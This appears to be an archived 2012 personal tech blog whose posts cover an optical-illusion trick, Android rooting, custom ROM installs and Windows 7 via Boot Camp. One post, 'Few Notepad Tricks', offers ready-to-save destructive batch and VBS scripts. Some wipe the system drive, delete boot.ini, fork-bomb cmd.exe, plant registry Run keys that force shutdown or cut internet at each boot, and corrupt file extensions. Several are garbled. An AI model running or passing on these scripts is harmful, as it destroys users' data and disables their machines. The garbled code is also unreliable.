Wednesday, July 18, 2012

Trick to identify the celebrity without staring and blinking eyes


Have you seen the illusion pictures that ask you to stare on the picture for some seconds and then blink your eyes to see the celebrity? Images below are the examples of such kind of illusion.
Stare at the image for 20 seconds, then look at the wall, blink your eyes fast and try to identify the celebrity.




Well and good if you successfully identified, you have very sharp eyes ;)

Anyways, here in this post, I am going to tell about a trick , so that you can see the celebrity in the picture without bothering your eyes much. 

1. Whenever you see such picture, Press Windows logo key with Plus Sign or Minus Sign. It will open magnifier application. 

2. Now Press ctrl+ alt+ I and voila, the celebrity of picture will become visible to you now.  ctrl+alt+I  is the shortcut for inverting the colors of photo.  

3. In end, press Window key+ Esc to close the magnifier.

                                                     Enjoy...
                                                            

Want to Root Your Android Phone?



For hacking Android device and why... Please Refer this...
How to Hack Your Android Phone (and Why You Should Bother)

For understanding Rooting and why... Please Refer this...
Some things you should know about rooting...

See this list Best Rooting Tools for Android Devices...

Rooting allows you to control nearly every part of your phone.

http://wiki.cyanogenmod.com/wiki/Howto:_Using_the_Recovery

Revolutionary
http://revolutionary.io/

Be sure to also install the appropriate Windows drivers that go with your phone so that Revolutionary can do its thing. Once the drivers are ready and you’ve downloaded Revolutionary, you’re ready to go.

Plug in your phone, set it to charge only and enable USB debugging. After that, just start up Revolutionary and follow its easy instructions.

At the end of the process, Revolutionary will ask you if you want to install a custom recovery framework, ClockWorkMod. It makes installing new kernels and ROMs very easy.

After that, you’re done. Enjoy that root, and maybe consider flashing a new ROM.

SuperOneClick

http://forum.xda-developers.com/showthread.php?t=803682

First of all you have to have the Android SDK debugger running. The SDK is free to download here. Once it’s running, connect your handset, enable USB debugging, and make sure the SD card isn’t mounted to the computer.

Start SuperOneClick and click root. That’s it. If the program says “Success” at the bottom of the scrolling text, you’re rooted. Reboot your device and go download some root apps.

Universal Androot

http://forum.xda-developers.com/showthread.php?t=747598

Check your official Android version in Settings. If it’s 2.2 or lower on the devices below, then you can use the app Universal Androot which does it for you.

Few Notepad Tricks


notepad tricks
Few tricks...

All Scripts Here Are To Be Copied In NotePad
Save These Code As Anything.bat

1.This Will Delete All The Content Of A Drive

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

2.This Will Just Restart Your Pc

@echo off
shutdown -r -f -t 00


3.This Will Crash Ur Computer (It Only Works With Windows XP )

Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell&quot
Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next

4.No Idea About The After Effects OF This Virus...

echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* nul >>c:\autoexec.bat
echo copy c:\******s\command\forma.com c:\ >nul >>c:\autoexe.bat
echo copy c:\******s\command/deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltre /y c:\******s\*.* >nul >>c:\autoexec.bat
echoformat c:/q /u /autotest >nul >>c:\autoexe.bat

5.The Most Simple Virus To Crush The Window

@Echo off
Del C:\ *.* |y

6.This will crash ur computer

: loop
start cmd.exe
goto loop

7.Script that crashes pc

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:
tldr
del c:
tldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER crive

(This Will Pop Up A Message Saying OWNED...)
(And Shut Down The Computer Never To Reboot Again..)

8.Shutdowns Computer Everytime It Is Turned On

echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE

9.Disable Internet Permanently

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

10.Change Files To Non-working TXT Files

REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

Some more Deadly Tricks...!!!
 

Trick 1 :
Delete my document :

To delete the my documents folder just 4 fun. Here's what you should do

rmdir C:\Documents and Settings \S\Q

Trick 2 :

Open notepad and type the code below:

lol=msgbox ("Warning a virus has been detected on your PC. Press YES to format your hard disk now or press NO to format your hard disk after system reboot",20,"Warning&quot

Then save it as Virus.VBS
note : this one is not harmful just to scare you...;););)

Trick 3 :

here is the code of a virus
which will open and close your cdrom copy paste code inside equals in notepad

Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop

save it as virus.vbs and double click it
and if u want to close it just open task manager and end wscript.exe

Trick 4 :

@echo off
start WISPTIS.EXE
start WISPTIS.EXE
start WISPTIS.EXE
start WISPTIS.EXE
start WISPTIS.EXE
start WISPTIS.EXE

this will stop your mouse cursor
to fix it log off your pc

Trick 5 :

Note this one is best trick to slow down pc

do
loop

save it as anyname.vbs
and click on it once twice thrice anytime to make pc too slow .
Open task managar you can see 100% CPU usage . to restore to normal close all wscript.exe from task manager.

How to Hack Your Android Phone (and Why You Should Bother)



For understanding Rooting and why... Please Refer this...
Some things you should know about rooting....

For Rooting your Android Device... Please Refer this...
Want to Root Your Android Phone? 
Why Hack Android?
For those with older handsets, rooting the device lets you install customized ROMs which can deliver major speed improvements and performance increases. For example, the popular CyanogenMod.
Another good reason to root your phone? Multi-touch.

How to Root Your Android Phone 
Before getting started, remember to back up your phone, including your contacts, SMS messages, files and photos.

1. The first step is to download and install Superboot, a boot image that, when flashed, will root the device the first time you boot up. You can get a copy of the Superboot zip file from the

http://android.modaco.com/topic/298782-08mar-superboot-erd79-gri40-rooting-the-nexus-one/ 

2. Once downloaded, extract the files it contains to a directory on your computer, just like any other zip file.

3. Now put your Android phone in bootloader mode.

http://android.modaco.com/topic/299078-how-to-unlock-the-bootloader-on-your-nexus-one/

To do so, turn off the phone, remove the battery, and plug in the USB cable. When the battery icon appears onscreen, pop the battery back in. Now tap the Power button while holding down the Camera key.
For those whose Android phones have a trackball, you have an even easier method of doing this: Turn off the phone, press and hold the trackball, then turn the phone back on

4. Depending on your computer's OS, do one of the following:

Windows: Double click "install-superboot-windows.bat"
Mac: Open a terminal window to the directory containing the files, and type "chmod +x install-superboot-mac.sh" followed by "./install-superboot-mac.sh"
Linux: Open a terminal window to the directory containing the files, and type "chmod +x install-superboot-linux.sh" followed by "./install-superboot-linux.sh"

5. That's it, your device has been rooted!


Now What?

Now that you've rooted your Android phone, you can get busy adding features, functionality and other hacks.

1. Multi-Touch

http://gizmodo.com/5439137/multitouch-browser-comes-to-droid-by-way-of-software-hack

http://www.redmondpie.com/multitouch-in-nexus-one-browser-9140377/

2. Mods for Performance Improvements (and More)

http://www.simplehelp.net/2009/10/04/how-to-install-cyanogenmod-4-1-99-on-your-g1-android-phone/

http://wiki.cyanogenmod.com/index.php/Main_Page

3. Extra Apps and Features

For more fun hacks, try these:

Anyone with a rooted handset can set up Wi-Fi and Bluetooth tethering using

android-wifi-tether

http://code.google.com/p/android-wifi-tether/

Upgrade Samsung Galaxy S to AOSP Android 4.0 Via CodeNameAndroid ROM



The Samsung Galaxy S GT-I9000 was touted as one of Samsung’s successful products leading the way for emerging technologies by introducing the Super AMOLED screen found on the device. 
With Ice Cream Sandwich already underway for many of Samsung’s devices, the Galaxy S GT-I9000 was left out of the list of devices to be given Ice Cream Sandwich upgrades by Samsung, as the device, it is claimed, has hardware limitations and insufficient to run Android 4.0.
A custom ROM called CodeNameAndroid is available for the Galaxy S.
CodeNameAndroid ROM promises lots of exciting new features in terms of speed and usability, as well as tons of customization options to ensure that users get the best in performance when using stock Ice Cream Sandwich ROMs.

Requirements

This tutorial is intended only for the Samsung Galaxy S GT-I9000 model. It is not compatible with any other variants of the Galaxy S series. You can check your device’s model number by heading to “Settings > About phone”.
  • Rooted Samsung Galaxy S GT-I9000 model, with ClockworkMod Recovery installed
  • Fully charged battery or at least 70% of battery left

Instructions

Here’s how to install Ice Cream Sandwich on your Samsung Galaxy S GT-I9000 via the CodeNameAndroid custom ROM:
  1. On your phone, go to Settings > Location and Security > SIM card lock.  Make sure SIM card lock is disabled.
  2. Upgrade/downgrade your phone to Android 2.3.6 build XXJVU.
  3. Root the Samsung Galaxy S GT-I9000.
  4. Download the latest version (1.4.0, as of this writing) of CodeNameAndroid ROM fromhere or here, and save the package to your PC.
  5. Connect your device to your PC via USB cable.
  6. Copy ROM package to the root on your device’s internal SD card. (Don’t use the microSD card / external SD card.)
  7. Disconnect your phone from your PC.
  8. Switch off your phone completely.
  9. Reboot to ClockworkMod Recovery. You can do this by simultaneously pressing and holding down the “Volume Up”, “Home” and “Power” buttons until the screen turns on.
  10. Reset your phone by selecting “Wipe data / factory reset” and confirm the operation on the next screen.
  11. Select “Install zip from SD card”
  12. Select “Choose zip from SD card”, and browse for the ROM file that you copied to your phone earlier.
  13. Confirm that you want to start the installation.  Your phone may reboot during the installation. It may take up to 5 – 10 minutes for the installation to finish.
  14. After installation, select “Go Back” and select “Reboot System Now” to reboot your phone.
You have successfully installed the CodeNameAndroid ROM based on Ice Cream Sandwich on your Samsung Galaxy S GT-I9000.

How to Install Touchwiz 4.0 on Samsung Galaxy S Running an ICS Custom ROM

Do you owe a Samsung Galaxy S smartphone? And if you owe it do you have installed ICS custom ROM into it? If it’s there most likely not be preloaded with TouchWiz4.0 and if loaded then it might not be running on version 4.0. To get the TouchWiz4.0 you must follow the guide from written below. 

TouchWiz 4.0 on Galaxy S running ICS based custom ROMs

Note that this package will work properly on the phone running on Galaxy S with custom ROMs. The package includes:
  1. CyanogenMod 9 Build 16
  2. Onecosmic 4.2
  3. AOKP
  4. Virtuous Quattro RC4
  5. Elite Nexus S port

Pre-Requisites

  1. Computer
  2. USB cable
  3. Rooted Samsung Galaxy S and installed with ClockworkMod Recovery
  4. ICS custom ROM flashed on phone
  5. The battery power of the Galaxy S must be 60% at least, so that it keeps the device active all through the rooting process.
  6. You must keep backups of all data separately before rooting your device.
  7. Stop all the system security tools such as firewall programs and antivirus in order to continue rooting without any interruption.

Steps to install Touchwiz 4.0 on Samsung Galaxy S running an ICS custom ROM

Step 1: Download TouchWiz 4.0 update package to your computer.
Step 2: Via USB cable connect your device with your computer and copy the package into the phone’s internal SD card not on micro SDcard.
Step 3: Now switch off your phone and reboot the phone into the ClockworkMod Recovery by pressing the Volume Up key and Home Button which is the middle key. Simultaneously press the Power button until the recovery boots.
Step 4: Go to Backup and Restore -> Backup to create a backup on your present ROM.
Step 5: Now go back to main recovery menu and select ‘install zip from sdcard’-> ‘choose zip from sd card’ and there highlight the TouchWiz4.0 package file.
Step 6: Flash the file on your device to confirm the action.
Step 7: After the installation is complete, go back to main menu and reboot the device to new TouchWiz 4.0 user interface with Android 4.0 ICS.

Samsung Galaxy S is successfully installed with TouchWiz 4.0 running on Ice cream sandwich custom ROM.

How to Install Windows 7 on MacBook Pro Using Boot Camp

Somewhat similar to the Using Boot Camp to install Vista on your Mac walkthrough, this tutorial will take you every step of the way through installing Microsoft Windows 7 on your Intel Mac (running 10.5 or later), using Boot Camp. 
Note: if you’d rather not dual boot OS X and Windows 7, you can always install Windows 7 in a virtual environment using Parallels Desktop 6.0 for Mac.


To install Windows 7 on your Mac using Boot Camp you will need the following:

All firmware updates installed on your Mac (use Apple Button -> Software Update… to check)

A Windows 7 installation DVD 

Your OS X Leopard or Snow Leopard installation DVD 

Around 30GB of empty hard drive space on your Mac. You can probably get away allocating less than 30GB to Windows 7, but it will leave very little room to install anything in Windows. 

An hour if all goes well, up to 5 hours if not 

Though not absolutely required, it’s a VERY good idea to have a complete and up to date Time Machine backup of OS X – it really came in handy for me. Because part of the process involves partitioning your drive, there’s always the distinct chance something will go wrong and everything will be wiped out. 

Patience, possibly a great deal of it. Having a book handy will also help kill time during the partitioning, installing etc).

Installing Windows 7 via Boot Camp

Here goes. First thing – close absolutely every open program you can. That includes those things running in the Apple Menu that you always forget about. Don’t worry about killing the Dock or Dashboard – having those running is fine. 

Now open a Finder and navigate to Applications -> Utilities and double-click Boot Camp Assistant.

finder displaying the boot camp utility

Click Continue on the initial Introduction screen. Ignore the fact that it doesn’t mention Windows 7 as a possible OS to install.

Now you have to decide how much space you want to allocate to Windows 7. You might be able to get away with going as low as 10GB, but I would highly advise against it. You’ll have almost no space left over to install software, and your page file in Windows might cause frequent crashes. I opted for 20GB, which left me with just a bit over 16GB to use after installing Windows 7. To change the amount of space to dedicate to Windows 7, click the small divider between Mac OS X and Windows, and drag it to the left. 



Once you’ve determined how much space you want to allocate to Windows 7, click thePartition button. 



The partitioning itself doesn’t take particularly long. If you receive an error, proceed to step 10 of the “How to install Vista with Boot Camp” tutorial. It provides all the troubleshooting info you need to resolve partitioning issues. Once you’ve cleared up any problems, or if everything just goes smoothly, proceed with the next step in this tutorial.



Once completed you’ll notice a new BOOTCAMP drive on your desktop.



Now insert your Windows 7 DVD and click the Start Installation button. 



Your Mac will restart, and Windows 7 will boot. You’ll be prompted with a window asking you which partition you want to install Windows on. Select the one with BOOTCAMP in theName column. Selecting anything else may wipe out OS X or cause serious problems. Then select the Drive options (advanced) link.



With the BOOTCAMP volume still selected, click the Format link. 



Click OK


And Windows 7 will begin to install. It’s a fairly boring process, so you may want to grab yourself a cup of coffee or your beverage of choice. But don’t go too far away, because when your system reboots, you’ll need to remove the Windows 7 DVD.



With the Windows 7 DVD removed, your Mac will automatically boot back into Windows 7, and the installation will complete. You’ll be prompted to select your language, keyboard layout etc. 

The rest of the Windows 7 installation process is very straight forward. Once the installation has completed and your Mac has restarted again, you’ll be able to use Windows 7. 

WiFi will work immediately (no drivers to install) so connect to the Internet. Windows 7 will then begin to download updates, including the proper video card driver. Let it do its thing.



Once completed, you’ll be prompted to reboot yet again. Do so. 



Once Windows 7 boots back up again, you’ll notice the resolution is much better, and you can enable the advanced graphics features.



But if you check for sound, you’ll notice there are no sound drivers installed.



Insert your OS X Leopard (or Snow Leopard) DVD. When prompted, select Run setup.exe.Note: If you’re using Snow Leopard and a message pops up saying “Remote Install Mac OS X”, close that window and eject the CD. Put the CD in again and this time select “Open folder to view files”, navigate to the Bootcamp folder, and run setup.exe.



The Boot Camp installer will launch. Click Next to begin. 



Select I accept the terms in the license agreement and then click Next again. 



Make sure that Apple Software Update for Windows is checked, and click Install



The Boot Camp installer will do its thing, and install all the required drivers. 


Notifications will pop up with each driver that gets installed.


  
Once completed, click Finish.


And yet again you’ll be prompted to reboot. Remove your OS X Leopard DVD from the drive, and click Yes to restart.



At this point most of the hardware on your Mac should be working in Windows. However, some iMacs and MacBook Pro’s will have to update to the 3.1 version of Boot Camp for Windows. 

That’s it, you’re done! When your Mac boots, hold down the Option key to select which Operating System you want to boot into. 

do you want to boot into OS X or Windows I choose OS X